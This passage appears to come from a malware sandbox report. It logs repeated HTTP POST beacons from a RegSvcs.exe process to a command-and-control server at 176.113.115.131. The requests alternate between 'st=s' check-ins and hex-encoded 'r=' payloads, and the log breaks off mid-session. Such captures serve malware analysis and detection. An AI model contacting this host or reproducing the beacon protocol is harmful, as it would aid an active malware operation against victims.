                                                    Jan 8, 2025 08:45:36.742695093 CET5615180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:36.747241020 CET5615180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:36.752137899 CET8056151176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:37.467457056 CET8056151176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:37.467662096 CET5615180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:38.979352951 CET5615280192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:38.979353905 CET5615180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:38.984525919 CET8056152176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:38.984724998 CET8056151176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:38.986534119 CET5615180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:38.986586094 CET5615280192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:38.986635923 CET5615280192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:38.991852045 CET8056152176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:39.706770897 CET8056152176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:39.706831932 CET5615280192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:41.338344097 CET5615280192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:41.340399981 CET5615380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:41.343384027 CET8056152176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:41.344497919 CET5615280192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:41.345242023 CET8056153176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:41.348551035 CET5615380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:41.348551035 CET5615380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:41.353419065 CET8056153176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:42.036473036 CET8056153176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:42.036535025 CET5615380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:43.542963028 CET5615380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:43.543330908 CET5615480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:43.548032999 CET8056153176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:43.548079014 CET5615380192.168.2.4176.113.115.131
                                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                    Jan 8, 2025 08:42:41.233341932 CET | 53 | 55514 | 162.159.36.2 | 192.168.2.4
                                                    Jan 8, 2025 08:42:41.700047016 CET | 53 | 57110 | 1.1.1.1 | 192.168.2.4
                                                    • 176.113.115.131
                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    0 | 192.168.2.4 | 49733 | 176.113.115.131 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jan 8, 2025 08:42:02.113203049 CET | 160 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:42:02.811652899 CET | 197 | IN | HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:42:02 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    1 | 192.168.2.4 | 49737 | 176.113.115.131 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jan 8, 2025 08:42:04.327261925 CET | 312 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:42:05.045120955 CET | 196 | IN | HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:42:04 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    2 | 192.168.2.4 | 49738 | 176.113.115.131 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jan 8, 2025 08:42:06.683646917 CET | 160 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:42:07.377537966 CET | 197 | IN | HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:42:07 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    3 | 192.168.2.4 | 49740 | 176.113.115.131 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jan 8, 2025 08:42:08.888348103 CET | 312 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:42:09.574858904 CET | 196 | IN | HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:42:09 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    4 | 192.168.2.4 | 49743 | 176.113.115.131 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jan 8, 2025 08:42:11.201385021 CET | 160 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:42:11.897679090 CET | 197 | IN | HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:42:11 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    5 | 192.168.2.4 | 49745 | 176.113.115.131 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jan 8, 2025 08:42:13.420110941 CET | 312 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:42:14.191576004 CET | 196 | IN | HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:42:14 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    6 | 192.168.2.4 | 49748 | 176.113.115.131 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jan 8, 2025 08:42:15.978667021 CET | 160 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:42:16.679409027 CET | 197 | IN | HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:42:16 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    7 | 192.168.2.4 | 49749 | 176.113.115.131 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jan 8, 2025 08:42:18.202264071 CET | 312 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:42:18.914427042 CET | 196 | IN | HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:42:18 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    8 | 192.168.2.4 | 49750 | 176.113.115.131 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jan 8, 2025 08:42:20.566791058 CET | 160 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:42:21.269119024 CET | 197 | IN | HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:42:21 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    9 | 192.168.2.4 | 49751 | 176.113.115.131 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jan 8, 2025 08:42:22.795001030 CET | 312 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:42:23.498547077 CET | 196 | IN | HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:42:23 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    10 | 192.168.2.4 | 49752 | 176.113.115.131 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jan 8, 2025 08:42:25.138719082 CET | 160 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:42:25.831198931 CET | 197 | IN | HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:42:25 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    11 | 192.168.2.4 | 49753 | 176.113.115.131 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jan 8, 2025 08:42:27.342251062 CET | 312 | OUT | POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:42:28.049412012 CET | 196 | IN | HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:42:27 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


Session ID: 12 | Source: 192.168.2.4:49754 | Destination: 176.113.115.131:80 | PID: 1436 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Jan 8, 2025 08:42:29.688921928 CET | 160 bytes | OUT
POST /8Fvu5jh4DbS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.131
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s

Jan 8, 2025 08:42:30.393450022 CET | 197 bytes | IN
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 Jan 2025 07:42:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0


Session ID: 13 | Source: 192.168.2.4:49755 | Destination: 176.113.115.131:80 | PID: 1436 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Jan 8, 2025 08:42:31.904637098 CET | 312 bytes | OUT
POST /8Fvu5jh4DbS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.131
Content-Length: 154
Cache-Control: no-cache
Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B

Jan 8, 2025 08:42:32.618551016 CET | 196 bytes | IN
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 Jan 2025 07:42:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID: 14 | Source: 192.168.2.4:49756 | Destination: 176.113.115.131:80 | PID: 1436 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Jan 8, 2025 08:42:34.248143911 CET | 160 bytes | OUT
POST /8Fvu5jh4DbS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.131
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s

Jan 8, 2025 08:42:34.952279091 CET | 197 bytes | IN
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 Jan 2025 07:42:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0


Session ID: 15 | Source: 192.168.2.4:49757 | Destination: 176.113.115.131:80 | PID: 1436 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Jan 8, 2025 08:42:36.466681957 CET | 312 bytes | OUT
POST /8Fvu5jh4DbS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.131
Content-Length: 154
Cache-Control: no-cache
Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B

Jan 8, 2025 08:42:37.175318003 CET | 196 bytes | IN
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 Jan 2025 07:42:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID: 16 | Source: 192.168.2.4:49758 | Destination: 176.113.115.131:80 | PID: 1436 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Jan 8, 2025 08:42:38.810637951 CET | 160 bytes | OUT
POST /8Fvu5jh4DbS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.131
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s

Jan 8, 2025 08:42:39.525396109 CET | 197 bytes | IN
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 Jan 2025 07:42:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0


Session ID: 17 | Source: 192.168.2.4:49759 | Destination: 176.113.115.131:80 | PID: 1436 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Jan 8, 2025 08:42:41.046906948 CET | 312 bytes | OUT
POST /8Fvu5jh4DbS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.131
Content-Length: 154
Cache-Control: no-cache
Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B

Jan 8, 2025 08:42:41.763613939 CET | 196 bytes | IN
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 Jan 2025 07:42:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID: 18 | Source: 192.168.2.4:55810 | Destination: 176.113.115.131:80 | PID: 1436 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Jan 8, 2025 08:42:43.390624046 CET | 160 bytes | OUT
POST /8Fvu5jh4DbS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.131
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s

Jan 8, 2025 08:42:44.077456951 CET | 197 bytes | IN
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 Jan 2025 07:42:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0


Session ID: 19 | Source: 192.168.2.4:55811 | Destination: 176.113.115.131:80 | PID: 1436 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Jan 8, 2025 08:42:45.591969013 CET | 312 bytes | OUT
POST /8Fvu5jh4DbS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.131
Content-Length: 154
Cache-Control: no-cache
